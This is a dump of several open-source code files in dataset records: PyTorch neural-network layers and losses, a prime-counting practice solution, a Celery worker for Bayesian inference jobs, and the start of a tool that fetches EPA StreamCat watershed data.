nn.Parameter(torch.tensor(posEmb, dtype=torch.float32), requires_grad=False) # seqLen × feaSize\n self.transformerLayers = nn.Sequential(\n OrderedDict(\n [('transformer%d'%i, Transformer(featureSize, dk, multiNum, dropout)) for i in range(layersNum)]\n )\n )\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x, xlen=None):\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n x = self.dropout(x+self.posEmb) # => batchSize × seqLen × feaSize\n return self.transformerLayers((x, xlen)) # => batchSize × seqLen × feaSize\n\nclass Transformer_Wcnn(nn.Module):\n def __init__(self, featureSize, dk, multiNum, seqMaxLen, dropout=0.1):\n super(Transformer_Wcnn, self).__init__()\n self.dk = dk\n self.multiNum = multiNum\n self.WQ = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WK = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WV = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WO = nn.Linear(self.dk*multiNum, featureSize)\n self.layerNorm1 = nn.LayerNorm([seqMaxLen, featureSize])\n self.layerNorm2 = nn.LayerNorm([seqMaxLen, featureSize])\n self.Wcnn = TextCNN(featureSize, featureSize, [1,3,5], reduction='None', actFunc=nn.ReLU(), name='Wffn_CNN')\n self.Wffn = nn.Sequential(\n nn.Linear(featureSize*3, featureSize), \n )\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n queries = [self.WQ[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n keys = [self.WK[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n values = [self.WQ[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n score = [torch.bmm(queries[i], keys[i].transpose(1,2))/np.sqrt(self.dk) for i in range(self.multiNum)] # => 
multiNum*(batchSize × seqLen × seqLen)\n z = [torch.bmm(F.softmax(score[i], dim=2), values[i]) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n z = self.WO(torch.cat(z, dim=2)) # => batchSize × seqLen × feaSize\n z = x + self.dropout(self.layerNorm1(z)) # => batchSize × seqLen × feaSize\n ffnx = torch.cat(self.Wcnn(z), dim=2) # => batchSize × seqLen × feaSize*3\n ffnx = self.Wffn(ffnx) # => batchSize × seqLen × feaSize\n return z+self.dropout(self.layerNorm2(ffnx)) # => batchSize × seqLen × feaSize\n\nclass TextTransformer_Wcnn(nn.Module):\n def __init__(self, layersNum, featureSize, dk, multiNum, seqMaxLen, dropout=0.1, name='textTransformer'):\n super(TextTransformer_Wcnn, self).__init__()\n #posEmb = [[np.sin(pos/10000**(2*i/featureSize)) if i%2==0 else np.cos(pos/10000**(2*i/featureSize)) for i in range(featureSize)] for pos in range(seqMaxLen)]\n #self.posEmb = nn.Parameter(torch.tensor(posEmb, dtype=torch.float32), requires_grad=False) # seqLen × feaSize\n self.transformerLayers = nn.Sequential(\n OrderedDict(\n [('transformer%d'%i, Transformer_Wcnn(featureSize, dk, multiNum, seqMaxLen, dropout)) for i in range(layersNum)]\n )\n )\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n x = self.dropout(x) # => batchSize × seqLen × feaSize\n return self.transformerLayers(x) # => batchSize × seqLen × feaSize\n\nclass HierarchicalSoftmax(nn.Module):\n def __init__(self, inSize, hierarchicalStructure, lab2id, hiddenList1=[], hiddenList2=[], dropout=0.1, name='HierarchicalSoftmax'):\n super(HierarchicalSoftmax, self).__init__()\n self.name = name\n self.dropout = nn.Dropout(p=dropout)\n layers = nn.Sequential()\n for i,os in enumerate(hiddenList1):\n layers.add_module(str(i*2), nn.Linear(inSize, os))\n layers.add_module(str(i*2+1), nn.ReLU())\n inSize = os\n self.hiddenLayers1 = layers\n moduleList = [nn.Linear(inSize, len(hierarchicalStructure))]\n\n layers = nn.Sequential()\n for i,os in enumerate(hiddenList2):\n layers.add_module(str(i*2), nn.Linear(inSize, os))\n layers.add_module(str(i*2+1), nn.ReLU())\n inSize = os\n self.hiddenLayers2 = layers\n\n for i in hierarchicalStructure:\n moduleList.append( nn.Linear(inSize, len(i)) )\n for j in range(len(i)):\n i[j] = lab2id[i[j]]\n self.hierarchicalNum = [len(i) for i in hierarchicalStructure]\n self.restoreIndex = np.argsort(sum(hierarchicalStructure,[]))\n self.linearList = nn.ModuleList(moduleList)\n def forward(self, x):\n # x: batchSize × feaSize\n x = self.hiddenLayers1(x)\n x = self.dropout(x)\n y = [F.softmax(linear(x), dim=1) for linear in self.linearList[:1]]\n x = self.hiddenLayers2(x)\n y += [F.softmax(linear(x), dim=1) for linear in self.linearList[1:]]\n y = torch.cat([y[0][:,i-1].unsqueeze(1)*y[i] for i in range(1,len(y))], dim=1) # => batchSize × classNum\n return y[:,self.restoreIndex]\n\nclass FocalCrossEntropyLoss(nn.Module):\n def __init__(self, gama=2, weight=-1, logit=True):\n super(FocalCrossEntropyLoss, self).__init__()\n self.weight = torch.nn.Parameter(torch.tensor(weight, dtype=torch.float32), requires_grad=False)\n self.gama = gama\n self.logit = logit\n def forward(self, Y_pre, Y):\n if self.logit:\n Y_pre = F.softmax(Y_pre, dim=1)\n P = Y_pre[list(range(len(Y))), Y]\n if self.weight.shape!=torch.Size([]):\n w = self.weight[Y]\n else:\n w = torch.tensor([1.0 for i in range(len(Y))], device=self.weight.device)\n w = (w/w.sum()).reshape(-1)\n return (-w*((1-P)**self.gama * torch.log(P))).sum()\n\nclass 
ContinusCrossEntropyLoss(nn.Module):\n def __init__(self, gama=2):\n super(ContinusCrossEntropyLoss, self).__init__()\n self.gama = gama\n def forward(self, Y_logit, Y):\n Y_pre = F.softmax(Y_logit, dim=1)\n lab_pre = Y_pre.argmax(dim=1)\n P = Y_pre[list(range(len(Y))), Y]\n w = ((1+(lab_pre-Y).abs())**self.gama).float()\n w = (w/w.sum()).reshape(-1)\n return (-w*torch.log(P)).sum()\n\nclass PairWiseRankingLoss(nn.Module):\n def __init__(self, gama=1):\n super(PairWiseRankingLoss, self).__init__()\n self.gama = gama\n def forward(self, Y_logit, Y):\n # Y_logit, Y: batchSize1 × batchSize2;\n Y_pre = F.sigmoid(Y_logit)\n loss,cnt = 0,0\n for y_pre,y in zip(Y_pre,Y):\n # batchSize2\n neg = y_pre[y==0].unsqueeze(dim=1) # negNum × 1\n pos = y_pre[y==1].unsqueeze(dim=0) # 1 × posNum\n tmp = self.gama+(neg-pos) # => negNum × posNum\n tmp[tmp<0] = 0\n loss += tmp.sum()\n cnt += tmp.shape[0]*tmp.shape[1]\n return loss\n\nclass MultiLabelCircleLoss(nn.Module):\n def __init__(self):\n super(MultiLabelCircleLoss, self).__init__()\n def forward(self, Y_logit, Y):\n loss,cnt = 0,0\n for yp,yt in zip(Y_logit,Y):\n neg = yp[yt==0]\n pos = yp[yt==1]\n loss += torch.log(1+torch.exp(neg).sum()) + torch.log(1+torch.exp(-pos).sum())\n #loss += torch.log(1+(F.sigmoid(neg)**2*torch.exp(neg)).sum()) + torch.log(1+((1-F.sigmoid(pos))**2*torch.exp(-pos)).sum())\n #loss += len(yp) * (torch.log(1+torch.exp(neg).sum()/len(neg)) + torch.log(1+torch.exp(-pos).sum()/len(pos)))\n cnt += 1\n return loss/cnt\n\n'''\nimport torch\nfrom nnLayer import *\nY = torch.tensor([0,2], dtype=torch.long)\nY_logit = torch.tensor([[0.1,0.9,1],[0.6,2,0.4]], dtype=torch.float32)\nCCEL = ContinusCrossEntropyLoss()\nCCEL(Y_logit, Y)\n'''\n\nclass MultiTaskCEL(nn.Module):\n def __init__(self, lossBalanced=True, ageW=1, genderW=1, name='MTCEL'):\n super(MultiTaskCEL, self).__init__()\n self.genderCriterion,self.ageCriterion = nn.CrossEntropyLoss(),nn.CrossEntropyLoss()#ContinusCrossEntropyLoss()#\n self.genderS,self.ageS = nn.Parameter(torch.zeros(1,dtype=torch.float), requires_grad=lossBalanced),nn.Parameter(torch.zeros(1,dtype=torch.float), requires_grad=lossBalanced)\n self.lossBalanced = lossBalanced\n self.name = name\n self.ageW,self.genderW = ageW,genderW\n def forward(self, genderY_logit, genderY, ageY_logit, ageY):\n if self.lossBalanced:\n return self.genderW * torch.exp(-self.genderS) * self.genderCriterion(genderY_logit,genderY) + self.ageW * torch.exp(-self.ageS) * self.ageCriterion(ageY_logit,ageY) + (self.genderS+self.ageS)/2\n else:\n return self.genderW * self.genderCriterion(genderY_logit,genderY) + self.ageW * self.ageCriterion(ageY_logit,ageY)\n\n\ndef truncated_normal_(tensor,mean=0,std=0.09):\n with torch.no_grad():\n size = tensor.shape\n tmp = tensor.new_empty(size+(4,)).normal_()\n valid = (tmp < 2) & (tmp > -2)\n ind = valid.max(-1, keepdim=True)[1]\n tensor.data.copy_(tmp.gather(-1, ind).squeeze(-1))\n tensor.data.mul_(std).add_(mean)\n return tensor\n\n\ndef padding_to_multiple_of(n, mult):\n remainder = n % mult\n if remainder == 0:\n return 0\n return mult - remainder\n\n\ndef rope_flash(x,axis):\n # axis = [1,2]\n shape = list(x.shape)\n if isinstance(axis, int):\n axis = [axis]\n spatial_shape = [shape[i] for i in axis]\n total_len = 1\n for i in spatial_shape:\n total_len *= i\n \n position = torch.reshape(torch.tensor(np.arange(total_len),dtype=torch.float32,device=x.device),spatial_shape)\n \n for i in range(axis[-1] + 1, len(shape)-1, 1):\n position = position.unsqueeze(dim=-1)\n \n half_size = shape[-1] // 
2\n freq_seq = torch.tensor(np.arange(half_size),dtype=torch.float32,device=x.device)/float(half_size)\n inv_freq = 10000 ** -freq_seq\n sinusoid = einsum('...,d-> ...d', position, inv_freq)\n sin = torch.sin(sinusoid)\n cos = torch.cos(sinusoid)\n \n x1, x2 = x.chunk(2, dim=-1)\n return torch.cat([ x1 * cos- x2 * sin, x2 * cos + x1 * sin ], dim=-1)\n\n\nclass rel_pos_bias(nn.Module):\n def __init__(self, name='rel_pos_bias'):\n super(rel_pos_bias, self).__init__()\n # rel_pos_bias\n self.a = nn.Parameter(torch.ones(128))\n self.b = nn.Parameter(torch.ones(128))\n truncated_normal_(self.a, std = 0.02)\n truncated_normal_(self.b, std = 0.02)\n self.name = name\n\n def forward(self, c):\n a = rope_flash(self.a[None,:].repeat(c, 1),axis=0)\n b = rope_flash(self.b[None,:].repeat(c, 1),axis=0)\n t = einsum('mk,nk-> mn', a, b)\n return t\n\n# class flash_linear_trans(nn.Module):\n# def __init__(self, embSize, seqMaxLen, chunk_length,trans_s,index_layer, expansion_factor=2,shift_tokens=True):\n# super(flash_linear_trans, self).__init__()\n# self.expansion_factor = expansion_factor\n# self.seqMaxLen = seqMaxLen\n# self.s = trans_s\n# self.e = embSize * self.expansion_factor # e e=2d\n# self.chunk_length = chunk_length # 分块 划分为 num_chunks = n/c 个长度为chunk_length(c)的块\n \n# self.UV = nn.Linear(embSize, expansion_factor * embSize * 2 + trans_s) # 这是单独建立e*d,e*d,s*d的简便写法\n# truncated_normal_(self.UV.weight, std=0.02)\n\n# self.gamma = nn.Parameter(torch.ones(4, trans_s))\n# self.beta = nn.Parameter(torch.zeros(4, trans_s))\n# truncated_normal_(self.gamma, std = 0.02)\n# # self.out_2d = nn.Linear(self.e, self.e) \n# if (index_layer>0):\n# self.out = nn.Linear(self.e, self.e)\n# self.layerNorm = nn.LayerNorm(embSize*2)\n# else: \n# self.out = nn.Linear(self.e, embSize)\n# self.layerNorm = nn.LayerNorm(embSize)\n# truncated_normal_(self.out.weight, std=0.02)\n \n# #self.layerNorm = RMSNorm()\n# self.actFun = nn.SiLU()\n# self.actFun_ReLU = nn.ReLU()\n# self.shift_tokens = shift_tokens\n# self.dropout = nn.Dropout(p=0.1)\n# self.dropout02 = nn.Dropout(p=0.2)\n# self.rel_pos_bias = rel_pos_bias()\n\n# self.index_layer = index_layer\n\n# def forward(self, input, prev=None):\n# # input => batchSize × seqLen × embSize\n# # 分块\n# # 分成 batchSize × numChunks(g) × chunkLength(c) × embSize(d) \n# if self.shift_tokens:\n# x_shift, x_pass = input.chunk(2, dim = -1)\n# x_shift = F.pad(x_shift, (0, 0, 1, -1), value = 0.)\n# x = torch.cat((x_shift, x_pass), dim = -1) \n\n# padding = padding_to_multiple_of(self.seqMaxLen, self.chunk_length)\n\n# if padding>0:\n# x = F.pad(x, ( 0, 0, 0, padding))\n\n# num_chunks = int(x.shape[1]/self.chunk_length)\n\n# chunks = torch.chunk(x, num_chunks, dim=1)\n\n# x = torch.cat([chunks[i].unsqueeze(1) for i in range(len(chunks))], dim=1) # bgcd\n\n# _, g, c, d = list(x.shape) # g表示n/c,即 num_chunks, d 表示 embeddingSize\n \n# U, V, base = torch.split(self.actFun(self.UV(x)), [self.e, self.e, self.s],dim=-1) # => base=Z : bgcs V: bgce\n\n# base = einsum('...r, hr-> ...hr', base, self.gamma)+self.beta\n\n# base = rope_flash(base, axis=[1,2])\n\n# quad_q, quad_k, lin_q, lin_k = torch.chunk(base, 4, dim=-2)\n# quad_q = torch.squeeze(quad_q, dim=3)\n# quad_k = torch.squeeze(quad_k, dim=3)\n# lin_q = torch.squeeze(lin_q, dim=3)\n# lin_k = torch.squeeze(lin_k, dim=3)\n\n# bias = self.rel_pos_bias(c)\n# if prev is not None:\n# attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias + prev\n# else:\n# attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias \n# # # 
bias = self.rel_pos_bias(c)\n# # if prev is not None:\n# # attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + prev\n# # else:\n# # attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 \n# prev = attn\n# A = F.softmax(prev,dim=-1)\n# A = self.dropout(A) \n# quadratic = torch.matmul(A, V) # quadratic => bgce\n\n# lin_kv = torch.matmul(lin_k.transpose(2,3),V)\n# linear = torch.matmul(lin_q,lin_kv) /self.seqMaxLen # linear => bgce\n\n# U,quadratic, linear = map(lambda t: rearrange(t, 'b g n d -> b (g n) d')[:, :self.seqMaxLen], (U,quadratic, linear))\n# x = self.out(U * (quadratic+linear))\n \n# if(self.index_layer>0): #第二层\n# # x = self.out_2d(U * (quadratic+linear))\n# x = self.layerNorm(self.dropout(x)) # x => batchSize × SeqLen × [embSize*2]\n# else:\n# # GAU #第一层\n# # x = self.out(U * (quadratic+linear))\n# # Post Norm\n# x = self.layerNorm(input + self.dropout(x)) # x => batchSize × SeqLen × embSize\n# return x, prev\n\n\n# class FLASHLayer(nn.Module):\n# def __init__(self,embSize,seqMaxLen,chunk_length,trans_s,index_layer):\n# super(FLASHLayer, self).__init__()\n# self.flash_linear_trans = flash_linear_trans(embSize,seqMaxLen,chunk_length,trans_s,index_layer)\n\n# def forward(self, input,prev):\n# # x: batchSize × seqLen × embSize\n# x,prev = self.flash_linear_trans(input,prev)\n# return x,prev # => batchSize × seqLen × embSize\n\n\n# class FLASH(nn.Module): # 这里的feaSize = embeddingSize\n# def __init__(self, seqMaxLen, embSize, numLayers, chunk_length,trans_s,name='FLASH'):\n# super(FLASH, self).__init__()\n# self.FLASHLayers = nn.Sequential(\n# OrderedDict([\n# ('FLASHLayer_%d'%i, FLASHLayer(embSize, seqMaxLen,chunk_length,trans_s,i)) for i in range(numLayers)\n# ])\n# )\n# self.name = name\n \n# def forward(self, x):\n# # x: batchSize × seqLen × feaSize\n# prev = None\n# for lay in self.FLASHLayers:\n# x, prev = lay(x, prev=prev)\n# return x # => batchSize × seqLen × feaSize\n\n\nclass flash_linear_trans(nn.Module):\n def __init__(self, embSize, seqMaxLen, chunk_length, trans_s, expansion_factor=2, s=300, shift_tokens=True):\n super(flash_linear_trans, self).__init__()\n self.expansion_factor = expansion_factor\n self.seqMaxLen = seqMaxLen\n self.s = trans_s\n self.e = embSize * self.expansion_factor # e e=2d\n self.chunk_length = chunk_length # 分块 划分为 num_chunks = n/c 个长度为chunk_length(c)的块\n \n self.UV = nn.Linear(embSize, expansion_factor * embSize * 2 + trans_s) # 这是单独建立e*d,e*d,s*d的简便写法\n truncated_normal_(self.UV.weight, std=0.02)\n\n self.gamma = nn.Parameter(torch.ones(4, trans_s))\n self.beta = nn.Parameter(torch.zeros(4, trans_s))\n truncated_normal_(self.gamma, std = 0.02)\n \n self.out = nn.Linear(self.e, embSize)\n truncated_normal_(self.out.weight, std=0.02)\n \n self.layerNorm = nn.LayerNorm(embSize)\n #self.layerNorm = RMSNorm()\n self.actFun = nn.SiLU()\n self.actFun_ReLU = nn.ReLU()\n self.shift_tokens = shift_tokens\n self.dropout = nn.Dropout(p=0.1)\n self.dropout02 = nn.Dropout(p=0.2)\n self.rel_pos_bias = rel_pos_bias()\n\n def forward(self, input, prev=None):\n # input => batchSize × seqLen × embSize\n # 分块\n # 分成 batchSize × numChunks(g) × chunkLength(c) × embSize(d) \n if self.shift_tokens:\n x_shift, x_pass = input.chunk(2, dim = -1)\n x_shift = F.pad(x_shift, (0, 0, 1, -1), value = 0.)\n x = torch.cat((x_shift, x_pass), dim = -1) \n\n padding = padding_to_multiple_of(self.seqMaxLen, self.chunk_length)\n\n if padding>0:\n x = F.pad(x, ( 0, 0, 0, padding))\n\n num_chunks = int(x.shape[1]/self.chunk_length)\n\n chunks = torch.chunk(x, 
num_chunks, dim=1)\n\n x = torch.cat([chunks[i].unsqueeze(1) for i in range(len(chunks))], dim=1) # bgcd\n\n _, g, c, d = list(x.shape) # g表示n/c,即 num_chunks, d 表示 embeddingSize\n \n U, V, base = torch.split(self.actFun(self.UV(x)), [self.e, self.e, self.s],dim=-1) # => base=Z : bgcs V: bgce\n\n base = einsum('...r, hr-> ...hr', base, self.gamma)+self.beta\n\n base = rope_flash(base, axis=[1,2])\n\n quad_q, quad_k, lin_q, lin_k = torch.chunk(base, 4, dim=-2)\n quad_q = torch.squeeze(quad_q, dim=3)\n quad_k = torch.squeeze(quad_k, dim=3)\n lin_q = torch.squeeze(lin_q, dim=3)\n lin_k = torch.squeeze(lin_k, dim=3)\n\n bias = self.rel_pos_bias(c)\n if prev is not None:\n attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias + prev\n else:\n attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias \n prev = attn\n A = F.softmax(prev,dim=-1)\n A = self.dropout(A) \n quadratic = torch.matmul(A, V) # quadratic => bgce\n\n lin_kv = torch.matmul(lin_k.transpose(2,3),V)\n linear = torch.matmul(lin_q,lin_kv) /self.seqMaxLen # linear => bgce\n\n U,quadratic, linear = map(lambda t: rearrange(t, 'b g n d -> b (g n) d')[:, :self.seqMaxLen], (U,quadratic, linear))\n \n # GAU\n x = self.out(U * (quadratic+linear))\n \n # Post Norm\n \n x = self.layerNorm(input + self.dropout(x)) # x => batchSize × SeqLen × embSize\n return x, prev\n\n\nclass FLASHLayer(nn.Module):\n def __init__(self,embSize,seqMaxLen,chunk_length,trans_s):\n super(FLASHLayer, self).__init__()\n self.flash_linear_trans = flash_linear_trans(embSize,seqMaxLen,chunk_length,trans_s)\n\n def forward(self, input,prev):\n # x: batchSize × seqLen × embSize\n x,prev = self.flash_linear_trans(input,prev)\n return x,prev # => batchSize × seqLen × embSize\n\n\nclass FLASH(nn.Module): # 这里的feaSize = embeddingSize\n def __init__(self, seqMaxLen, embSize, numLayers, chunk_length, trans_s, name='FLASH'):\n super(FLASH, self).__init__()\n self.FLASHLayers = nn.Sequential(\n OrderedDict([\n ('FLASHLayer_%d'%i, FLASHLayer(embSize, seqMaxLen, chunk_length, trans_s)) for i in range(numLayers)\n ])\n )\n self.name = name\n \n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n prev = None\n for lay in self.FLASHLayers:\n x, prev = lay(x, prev=prev)\n return x # => batchSize × seqLen × feaSize\n","repo_name":"CSUBioGroup/RetrieveICD","sub_path":"nnLayer.py","file_name":"nnLayer.py","file_ext":"py","file_size_in_byte":57855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"6481385072","text":"def changeNumber(n, k):\n res = \"\"\n while 0 < n:\n res = str(n % k) + res\n n //= k\n return res\n\ndef isPrime(n):\n if n == 1: return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True\n\ndef solution(n, k):\n answer = 0\n res = changeNumber(n, k)\n temp = \"\"\n for i in range(len(res)):\n if res[i] != '0':\n temp += res[i]\n else:\n if temp != \"\" and isPrime(int(temp)):\n answer += 1\n temp = \"\"\n if temp != \"\" and isPrime(int(temp)):\n answer += 1\n return answer\n\nprint(solution(437674, 3))\nprint(solution(110011, 10))","repo_name":"maltepoo/algorithm","sub_path":"PROGRAMMERS/lv.2/k진수에서 소수 개수 구하기.py","file_name":"k진수에서 소수 개수 구하기.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28735372928","text":"import json\nfrom datetime import datetime\nfrom hashlib import sha256\nimport os\nimport socket\n\nbroker = 
os.environ['NLB_QUEUE_BROKER']\nbackend = os.environ['NLB_QUEUE_BACKEND']\nmongo_url = os.environ['NLB_DATA_STORE']\n\nfrom celery import Celery\nfrom pymongo import MongoClient\nimport gridfs\nfrom bson.objectid import ObjectId\n\nfrom nlbayes import ModelORNOR\n\n\nclass NLBayesFS:\n def __init__(self, mongo_client) -> None:\n gfs_db = mongo_client.nlbayes_gfs_db\n self.gfs = gridfs.GridFS(gfs_db)\n\n def save_file(self, filebytes, filename):\n hash = sha256(filebytes).hexdigest()\n\n if not self.gfs.exists(_id=hash):\n self.gfs.put(filebytes, _id=hash, filename=filename)\n else:\n file = self.gfs.find_one({'_id': hash})\n if filename != file.filename:\n raise ValueError('filename is different')\n\n return hash\n\n def load_file(self, hash):\n\n file = self.gfs.find_one({'_id': hash})\n return file.read()\n\n\nworker = Celery('nlbayes_jobs', backend=backend, broker=broker)\n@worker.task(bind=True, name=\"ornor_inference\")\ndef taskModelORNOR(self, job_id):\n mongo_client = MongoClient(mongo_url)\n jobs = mongo_client.nlbayes_job_db.jobs\n fs = NLBayesFS(mongo_client)\n\n query = {'_id': ObjectId(job_id)}\n job = jobs.find_one(query)\n\n network_hash = job['network_hash']\n evidence_hash = job['evidence_hash']\n config = job['config']\n\n network = json.loads(fs.load_file(network_hash))\n evidence = json.loads(fs.load_file(evidence_hash))\n model = ModelORNOR(network, evidence, **config)\n\n start_time = datetime.now()\n meta = { 'job_id': job_id,\n 'worker_id': socket.gethostname(),\n 'start_time': start_time.isoformat(), }\n jobs.update_one(query, {\"$set\": {'meta': meta}}, upsert=False)\n\n converged = False\n self.update_state(state=\"BURNIN\", meta=meta)\n while not converged:\n status = model.sample_n(20, 5, 5.0, False, True)\n converged = status == 0\n\n current_time = datetime.now()\n elapsed_time = current_time - start_time\n progress = { 'n_sampled': model.total_sampled,\n 'gr_stat': model.get_max_gelman_rubin(), \n 'elapsed_time': str(elapsed_time), }\n meta.update(progress)\n self.update_state(state=\"BURNIN\", meta=meta)\n\n model.burn_stats()\n\n N = 10000\n converged = False\n self.update_state(state=\"SAMPLING\", meta=meta)\n while model.total_sampled < N and not converged:\n n = min(20, N - model.total_sampled)\n status = model.sample_n(n, 5, 1.15, False, True)\n converged = status == 0\n\n current_time = datetime.now()\n elapsed_time = current_time - start_time\n progress = { 'n_sampled': model.total_sampled,\n 'gr_stat': model.get_max_gelman_rubin(),\n 'elapsed_time': str(elapsed_time), }\n meta.update(progress)\n self.update_state(state=\"SAMPLING\", meta=meta)\n\n meta.update({'end_time': current_time.isoformat()})\n self.update_state(state=\"COMPLETE\", meta=meta)\n\n posterior = { 'X': model.get_posterior_mean_stat('X', 1),\n 'T': model.get_posterior_mean_stat('T', 0), }\n posterior_b = json.dumps(posterior).encode()\n posterior_hash = fs.save_file(posterior_b, 'posterior.json')\n\n data = { 'meta': meta,\n 'posterior_hash': posterior_hash, }\n jobs.update_one(query, {\"$set\": data}, upsert=False)\n\n mongo_client.close()\n\n return data\n","repo_name":"umbibio/nlbayes-app","sub_path":"worker/nlbayes_tasks.py","file_name":"nlbayes_tasks.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25084658420","text":"import traceback\n#import geopandas as gpd\nimport requests\nimport json,pickle\nimport os\nimport multiprocessing as mp\nimport numpy as np\nimport 
html\nimport logging, logging.handlers\nimport re\nfrom copy import deepcopy\nfrom random import shuffle\nfrom mylogger import myLogger\nfrom sqlitedict import SqliteDict\nimport zlib, pickle, sqlite3\n\nclass GeogTool(myLogger):\n def __init__(self,sc_data_dir=None):\n myLogger.__init__(self,name='GeogTool.log')\n self.logger.info('starting GeogTool logger')\n self.cwd=os.getcwd()\n try: self.geogdatadir\n except:\n self.geogdatadir=os.path.join(os.getcwd(),'NHDplus_data')\n self.NHDplus_path=os.path.join(self.geogdatadir,'NHDplus')\n self.huc12comiddict_path=os.path.join(self.geogdatadir,'huc12comiddict')\n self.NHDdbf_path=os.path.join(self.geogdatadir,'HUC12_PU_COMIDs_CONUS.dbf')\n self.NHDhuchuc_path=os.path.join(self.geogdatadir,'NHDhuchuc')\n self.failed_SC_comid_path=os.path.join('data_tool','failedSCcomidlist')\n if sc_data_dir is None:\n try: self.sc_data_dir\n except: \n localpath=os.path.join(self.cwd,'../../../hdd3','sc_data')\n if os.path.exists(localpath):\n self.sc_data_dir=localpath\n else:\n networkpath=os.path.join('o:','public','streamcat','sc_data')\n if os.path.exists(networkpath):\n self.sc_data_dir=networkpath\n else:\n self.sc_data_dir=None\n self.logger.error('cannot locate streamcat data. proceeding')\n #assert False, 'cannot locate local streamcat data'\n else: self.sc_data_dir=sc_data_dir\n print(\"streamcat data directory:\",self.sc_data_dir)\n #self.reverse_huc12comid() # this will build most/all of the NHDplus related files if they don't exist\n \n def my_encode(self,obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL),level=9))\n def my_decode(self,obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n #mydict = SqliteDict('./my_db.sqlite', encode=self.my_encode, decode=self.my_decode)\n \n def anyNameDB(self,dbname,tablename='data',folder=None):\n name=dbname+'.sqlite'\n if folder:\n path=os.path.join(folder,name)\n else:\n path=name\n return SqliteDict(\n filename=path,tablename=tablename,)\n #encode=self.my_encode,decode=self.my_decode)\n \n def addtoDB(self,dict_to_save,path):\n with self.anyNameDB(path) as db:\n for key,val in dict_to_save.items():\n db[key]=val\n db.commit()\n\n \n def getpickle(self,path):\n with open(path,'rb') as f:\n thefile=pickle.load(f)\n return thefile\n \n def savepickle(self,obj,path):\n with open(path,'wb') as f:\n pickle.dump(obj,f)\n \n \n def savejson(self,thing,path):\n while os.path.exists(path):\n path=path[:-5]+'_1.json'\n with open(path,'w') as f:\n json.dump(thing,f)\n return\n \n def openjson(self,path):\n with open(path,'r') as f:\n thing=json.load(f)\n return thing \n \n def getstreamcat(self,comidlist,process=1,local=1,add_huc12=1):\n #url = \"https://ofmpub.epa.gov/waters10/streamcat.jsonv25?pcomid={}&pLandscapeMetricType=Topography\"\n url = \"https://ofmpub.epa.gov/waters10/streamcat.jsonv25?pcomid={}\"\n #url=\"https://ofmpub.epa.gov/waters10/Watershed_Characterization.Control?pComID={}\"\n if type(comidlist) is str:\n comidlist=[comidlist]\n comidcount=len(comidlist)\n comidlist_datadict={}\n \n if local:\n comidlist_datadict=self.pullStreamCatForComidList(comidlist,add_huc12=add_huc12)\n else:\n for idx,comid in enumerate(comidlist):\n self.logger.info(f'starting {idx}/{comidcount}')\n result=requests.get(url.format(str(comid)))\n self.logger.info(f'retrieved {idx}/{comidcount}')\n success=0\n self.logger.info(f'type(result):{type(result)}')\n try:\n data=result.text\n try:\n comiddatadict=json.loads(data)\n except:\n self.logger.exception(f'failed to json.loads. 
comid:{comid}')\n datadict={'fail':data}\n except:\n self.logger.exception(f'failed to result.text. comid:{comid}')\n self.logger.debug(f'{data}')\n comiddatadict=result\n comidlist_datadict[str(comid)]=comiddatadict\n #infodict={'streamcatdata':comidlist_datadict}\n if process:\n streamcatdict=self.processStreamCat(comidlist_datadict)\n return streamcatdict\n else: \n return comidlist_datadict\n \n \n def processStreamCat(self,streamcatdata,collapse=1):\n try:\n if type(streamcatdata) is str:\n self.logger.debug(f'streamcatdata type is a str: {streamcatdata}')\n streamcatdata=self.anyNameDB(streamcatdata)\n outdict={}\n error_dict={}\n for comid,data in streamcatdata.items():\n collapse_dict={}\n error_dict[comid]={}\n metricdict={'Ws':{},'Cat':{},'CatRp100':{},'WsRp100':{},'Rp100':{},'other':{}}\n metadict=None\n mkeylist=[*metricdict] #the keys or mkeys\n #print('mkeylist',mkeylist)\n keylengths=[len(key) for key in mkeylist]\n keycount=len(mkeylist)\n regex_y2k=re.compile('20[0-9][0-9]')\n #nlcd_regex_y2k=re.compile('nlcd20[0-9][0-9]')\n #metrics=[*data]\n \n for metric,data_pt in data.items():\n \n srch_y=re.search(regex_y2k,metric)\n if srch_y:\n yr=metric[srch_y.start():srch_y.end()]\n metric_drop_yr=metric[:srch_y.start()]+metric[srch_y.end():]+'_avg'\n else:\n metric_drop_yr=metric\n yr='all'\n if collapse:\n try:\n try:\n float_data_pt=float(data_pt)\n except:\n if len(data_pt)==0 or data_pt=='NA':\n float_data_pt=np.nan\n else: \n float(data_pt)#force error\n if not metric_drop_yr in collapse_dict:\n collapse_dict[metric_drop_yr]=[float_data_pt]\n else:\n 